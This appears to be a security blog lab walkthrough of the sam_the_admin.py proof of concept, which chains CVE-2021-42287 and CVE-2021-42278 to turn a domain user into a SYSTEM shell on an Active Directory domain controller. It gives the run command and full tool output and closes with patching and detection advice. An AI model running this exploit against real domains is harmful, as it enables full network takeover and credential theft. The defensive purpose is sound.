A new year and a yet another way to take over Microsoft Active Directory.
Back in November last year, Microsoft patched two Active Directory privilege escalation vulnerabilities. When these two vulnerabilites are combined it allows for a domain user level takeover of an Active Directory setup.
These two privilege escalation vulnerabilities are tracked as CVE2021-42287 and CVE-2021-42278. Github user WazeHell created a PoC for the combined takeover attack using python3 and impacket. This tool was released on 11/12/21 on both Github and Twitter. Lets go ahead and lab it!

As always, seek permission before using such tools on a production network, or use a VMware lab that way no one gets hurt!

1. A Kali Linux VM (python3 and impacket should already be installed)
2. Download the repository from WazeHell github – sam_the_admin.py
3. In this example our VM host ip is and our DC is
4. Setup a standard Windows AD domain and a domain user account / password. Make sure November 2021 security patches are not installed.

1. Launch a Kali linux terminal and run the command:
python3 sam_the_admin.py "testdomain/dummy:TestdomainPW!" -dc-ip -shell
2. If all goes well you’ll see the privilege escalation output of the python script, wherein it creates a machine account and impersonates the administrator.
python3 sam_the_admin.py "testdomain/dummy:TestdomainPW!" -dc-ip -shell
Impacket v0.9.24.dev1+20210727.163808.5f1ced6d - Copyright 2021 SecureAuth Corporation
[*] Selected Target dc1.testdomain.network
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Current ms-DS-MachineAccountQuota = 10
[*] Adding Computer Account "SAMTHEADMIN-93$"
[*] MachineAccount "SAMTHEADMIN-93$" password = 4Ug3TAHquT^U
[*] Successfully added machine account SAMTHEADMIN-93$ with password redacted.
[*] SAMTHEADMIN-93$ object = CN=SAMTHEADMIN-93,CN=Computers,DC=testdomain,DC=network
[*] SAMTHEADMIN-93$ sAMAccountName == dc
[*] Saving ticket in dc1.ccache
[*] Resting the machine account to SAMTHEADMIN-93$
[*] Restored SAMTHEADMIN-93$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving ticket in Administrator.ccache
Impacket v0.9.24.dev1+20210727.163808.5f1ced6d - Copyright 2021 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute

3. It will drop to a shell on the DC where you are system:
nt authority\system


Install the November 2021 Microsoft Security patches for Windows Server platforms in your environment.
As you can see above, the exploit is trival to perform with minimal effort required.
You can use a threat query with 365 defender that Microsoft detail here.